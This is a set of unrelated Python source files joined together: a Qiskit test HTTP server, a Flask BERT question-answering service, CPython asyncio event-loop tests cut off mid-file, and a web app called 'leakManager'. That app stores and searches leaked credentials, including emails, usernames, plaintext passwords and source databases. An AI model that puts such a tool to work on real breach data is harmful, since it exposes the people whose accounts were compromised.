# Identify the capture to determine what to look for
capture_id = id_capture(capture)
# According to the capture and the ID, check if policy is enforced
check = check_capture(capture, capture_id, authorized_comms[src][dst][request_type], pods)
print("{:10s} {:11s} {:4s} {:14s} {:6s} {}".format(src.name, dst.name, request_type, capture_id, authorized_comms[src][dst][request_type], check))
print("\n")
terminate_app(0)
###############################################################################
|
http_server.py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""HTTP server for testing purposes."""
import threading
import json
from typing import Optional
from http.server import BaseHTTPRequestHandler, HTTPServer
class BaseHandler(BaseHTTPRequestHandler):
"""Base request handler for testing."""
def _get_code(self):
"""Get the status code to be returned."""
return 200
def _get_response_data(self):
"""Get the response data to be returned."""
return {}
def _respond(self):
"""Respond to the client."""
code = self._get_code()
self.send_response(code)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.rfile.read(int(self.headers.get('Content-Length', 0)))
if code == 200:
self.wfile.write(json.dumps(self._get_response_data()).encode(encoding='utf_8'))
def do_GET(self):
"""Process a GET request."""
# pylint: disable=invalid-name
self._respond()
def do_POST(self):
"""Process a POST request."""
# pylint: disable=invalid-name
self._respond()
def do_PUT(self):
"""Process a PUT request."""
# pylint: disable=invalid-name
self._respond()
class ServerErrorOnceHandler(BaseHandler):
"""Request handler that returns a server error once then a good response."""
valid_data = {}
bad_status_given = {}
def _get_code(self):
"""Return 200 if the path was seen before, otherwise 504."""
if self.bad_status_given.get(self.path):
return 200
self.bad_status_given[self.path] = True
return 504
def _get_response_data(self):
"""Return valid response data."""
return self.valid_data
class SimpleServer:
"""A simple test HTTP server."""
IP_ADDRESS = '127.0.0.1'
PORT = 8123
URL = "http://{}:{}".format(IP_ADDRESS, PORT)
def __init__(self, handler_class: BaseHandler, valid_data: Optional[dict] = None):
"""SimpleServer constructor.
Args:
handler_class: Request handler class.
valid_data: Data to be returned for a valid request.
"""
setattr(handler_class, 'valid_data', valid_data)
httpd = HTTPServer((self.IP_ADDRESS, self.PORT), handler_class)
self.server = threading.Thread(target=httpd.serve_forever, daemon=True)
def start(self):
"""Start the server."""
self.server.start()
|
index.py
|
#!/usr/local/bin/python3
# coding: utf-8
import hug
import time
import threading
from core.database import database
from core.templates import get_template
user,passwd = open('etc/leakManager.conf').read().split(':')
admin_area = hug.http(requires=hug.authentication.basic(hug.authentication.verify(user.strip(), passwd.strip())))
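# Every route registered on admin_area requires HTTP basic auth with the
# credentials read from etc/leakManager.conf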
@admin_area.post('/massInsert',output=hug.output_format.html)
def massInsert(body,request,response):
# The form field may arrive as bytes; strip the bytes-repr prefix/suffix before splitting
# on the escaped newlines produced by str()
leaks = str(body['leakmass']).replace("b'", "").rstrip("'").split('\\n')
count = len(leaks)
db = database()
thread = threading.Thread(target=db.saveMassLeaks, args=(leaks,))
thread.start()
message = 'You have loaded %d new leaks; they will be registered in the background!' % count
return "<script>alert('%s');document.location = '/'</script>" % message
@admin_area.post('/updatePassword')
def updatePassword(body):
db = database()
totalupdates = db.updatePassword(body['password-old'],body['password-new'])
message = '%d passwords were updated!' % totalupdates
return {"message":message}
@admin_area.get('/delete/{leakid}',output=hug.output_format.html)
def deleteLeak(leakid):
db = database()
db.deleteLeak(int(leakid))
message = 'leak deleted'
return "<script>alert('%s');document.location = '/'</script>" % message
@admin_area.post('/singleInsert')
def singleInsert(body):
checks = ['username','password','email','database']
for c in checks:
if c not in body:
return False
db = database()
db.insertLeak(username=body['username'],email=body['email'],password=body['password'],database=body['database'])
message = 'New leak created for e-mail %s' % body['email']
return {'message':message}
@admin_area.post('/search')
def search(body):
db = database()
results = list()
leaks = db.getLeaks(body['search'],body['searchby'])
for leak in leaks:
results.append({'id':leak.id,'email':leak.email,'username':leak.username,'password':leak.password,'database':leak.database})
return results
@admin_area.get('/',output=hug.output_format.html)
def index():
template = get_template('index.html')
db = database()
totalLeaks = db.getTotal()
lastLeaks = db.lastEntries()
return template.render({'total':totalLeaks,'leaks':lastLeaks})
@hug.static('/static')
def my_static_dirs():
return('static/',)
|
main.py
|
from transformers import AutoTokenizer, AutoModelForQuestionAnswering
from flask import Flask, request, jsonify, render_template
import torch
import torch.nn.functional as F
from queue import Queue, Empty
from threading import Thread
import time
app = Flask(__name__)
print("model loading...")
# Model & Tokenizer loading
tokenizer = AutoTokenizer.from_pretrained("./mrc-bert-base")
model = AutoModelForQuestionAnswering.from_pretrained("./mrc-bert-base")
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model.to(device)
requests_queue = Queue() # request queue.
BATCH_SIZE = 1 # max request size.
CHECK_INTERVAL = 0.1
print("complete model loading")
def handle_requests_by_batch():
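# Background worker: drain up to BATCH_SIZE queued requests, run the model on each,
# and store the result under req["output"], which generate() polls for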
while True:
request_batch = []
while not (len(request_batch) >= BATCH_SIZE):
try:
request_batch.append(requests_queue.get(timeout=CHECK_INTERVAL))
except Empty:
continue
for requests in request_batch:
try:
requests["output"] = make_answer(requests['input'][0], requests['input'][1])
except Exception as e:
# Store a JSON-serializable error so generate() can return it to the client
requests["output"] = {'error': str(e)}
# Start the batching worker thread (daemon so it does not block process shutdown)
handler = Thread(target=handle_requests_by_batch, daemon=True)
handler.start()
def make_answer(context, question):
try:
encodings = tokenizer(context, question, max_length=512, truncation=True,
padding="max_length", return_token_type_ids=False)
encodings = {key: torch.tensor([val]) for key, val in encodings.items()}
input_ids = encodings["input_ids"].to(device)
attention_mask = encodings["attention_mask"].to(device)
pred = model(input_ids, attention_mask=attention_mask)
start_logits, end_logits = pred.start_logits, pred.end_logits
token_start_index = F.softmax(start_logits, dim=-1).argmax(dim=-1)
token_end_index = F.softmax(end_logits, dim=-1).argmax(dim=-1)
answer_ids = input_ids[0][token_start_index: token_end_index + 1]
answer = tokenizer.decode(answer_ids)
result = dict()
result[0] = answer
return result
except Exception as e:
print('Error occurred while generating the answer!', e)
# Return a plain dict; jsonify() needs an application context and this runs in the worker thread
return {'error': str(e)}
@app.route('/generate', methods=['POST'])
def generate():
if requests_queue.qsize() > BATCH_SIZE:
return jsonify({'Error': 'Too Many Requests'}), 429
try:
args = []
context = request.form['context']
question = request.form['question']
args.append(context)
args.append(question)
except Exception:
return jsonify({'message': 'Invalid request'}), 400
req = {'input': args}
requests_queue.put(req)
while 'output' not in req:
time.sleep(CHECK_INTERVAL)
return jsonify(req['output'])
@app.route('/queue_clear')
def queue_clear():
while not requests_queue.empty():
requests_queue.get()
return "Clear", 200
@app.route('/healthz', methods=["GET"])
def health_check():
return "Health", 200
@app.route('/')
def main():
return render_template('main.html'), 200
if __name__ == '__main__':
app.run(port=5000, host='0.0.0.0')
|
test_events.py
|
"""Tests for events.py."""
import collections.abc
import concurrent.futures
import functools
import gc
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import proactor_events
from asyncio import selector_events
from asyncio import sslproto
from asyncio import test_utils
try:
from test import support
except ImportError:
from asyncio import test_support as support
def data_file(filename):
if hasattr(support, 'TEST_HOME_DIR'):
fullname = os.path.join(support.TEST_HOME_DIR, filename)
if os.path.isfile(fullname):
return fullname
fullname = os.path.join(os.path.dirname(__file__), filename)
if os.path.isfile(fullname):
return fullname
raise FileNotFoundError(filename)
def osx_tiger():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
ONLYCERT = data_file('ssl_cert.pem')
ONLYKEY = data_file('ssl_key.pem')
SIGNED_CERTFILE = data_file('keycert3.pem')
SIGNING_CA = data_file('pycacert.pem')
PEERCERT = {'serialNumber': 'B09264B1F2DA21D1',
'version': 1,
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Nov 13 19:47:07 2022 GMT',
'notBefore': 'Jan 4 19:47:07 2013 GMT'}
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = asyncio.Future(loop=loop)
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = asyncio.Future(loop=loop)
self.completed = asyncio.Future(loop=loop)
self.disconnects = {fd: asyncio.Future(loop=loop) for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.doCleanups()
support.gc_collect()
super().tearDown()
def test_run_until_complete_nesting(self):
@asyncio.coroutine
def coro1():
yield
@asyncio.coroutine
def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1, loop=self.loop))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
@asyncio.coroutine
def cb():
self.loop.stop()
yield from asyncio.sleep(0.1, loop=self.loop)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_reader_callback(self):
r, w = test_utils.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = test_utils.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
def _basetest_sock_client_ops(self, httpd, sock):
if not isinstance(self.loop, proactor_events.BaseProactorEventLoop):
# in debug mode, socket operations must fail
# if the socket is not in blocking mode
self.loop.set_debug(True)
sock.setblocking(True)
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_recv_into(sock, bytearray()))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_accept(sock))
# test in non-blocking mode
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
data = self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
# consume data
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
sock.close()
self.assertTrue(data.startswith(b'HTTP/1.0 200 OK'))
def _basetest_sock_recv_into(self, httpd, sock):
# same as _basetest_sock_client_ops, but using sock_recv_into
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
data = bytearray(1024)
with memoryview(data) as buf:
nbytes = self.loop.run_until_complete(
self.loop.sock_recv_into(sock, buf[:1024]))
# consume data
self.loop.run_until_complete(
self.loop.sock_recv_into(sock, buf[nbytes:]))
sock.close()
self.assertTrue(data.startswith(b'HTTP/1.0 200 OK'))
def test_sock_client_ops(self):
with test_utils.run_test_server() as httpd:
sock = socket.socket()
self._basetest_sock_client_ops(httpd, sock)
sock = socket.socket()
self._basetest_sock_recv_into(httpd, sock)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_unix_sock_client_ops(self):
with test_utils.run_test_unix_server() as httpd:
sock = socket.socket(socket.AF_UNIX)
self._basetest_sock_client_ops(httpd, sock)
sock = socket.socket(socket.AF_UNIX)
self._basetest_sock_recv_into(httpd, sock)
def test_sock_client_fail(self):
# Make sure that we will get an unused port
address = None
try:
s = socket.socket()
s.bind(('127.0.0.1', 0))
address = s.getsockname()
finally:
s.close()
sock = socket.socket()
sock.setblocking(False)
with self.assertRaises(ConnectionRefusedError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
sock.close()
def test_sock_accept(self):
listener = socket.socket()
listener.setblocking(False)
listener.bind(('127.0.0.1', 0))
listener.listen(1)
client = socket.socket()
client.connect(listener.getsockname())
f = self.loop.sock_accept(listener)
conn, addr = self.loop.run_until_complete(f)
self.assertEqual(conn.gettimeout(), 0)
self.assertEqual(addr, client.getsockname())
self.assertEqual(client.getpeername(), listener.getsockname())
client.close()
conn.close()
listener.close()
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(0.5, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def test_create_connection_sock(self):
with test_utils.run_test_server() as httpd:
sock = None
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*httpd.address, type=socket.SOCK_STREAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
def test_legacy_create_ssl_connection(self):
with test_utils.force_legacy_ssl_support():
self.test_create_ssl_connection()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_legacy_create_ssl_unix_connection(self):
with test_utils.force_legacy_ssl_support():
self.test_create_ssl_unix_connection()
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.socket()
lsock.bind(('127.0.0.1', 0))
lsock.listen(1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
support.join_thread(thread, timeout=1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(ONLYCERT, ONLYKEY)
if hasattr(server_context, 'check_hostname'):
server_context.check_hostname = False
server_context.verify_mode = ssl.CERT_NONE
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
if hasattr(server_context, 'check_hostname'):
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
self.test_connect_accepted_socket(server_context, client_context)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
@asyncio.coroutine
def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
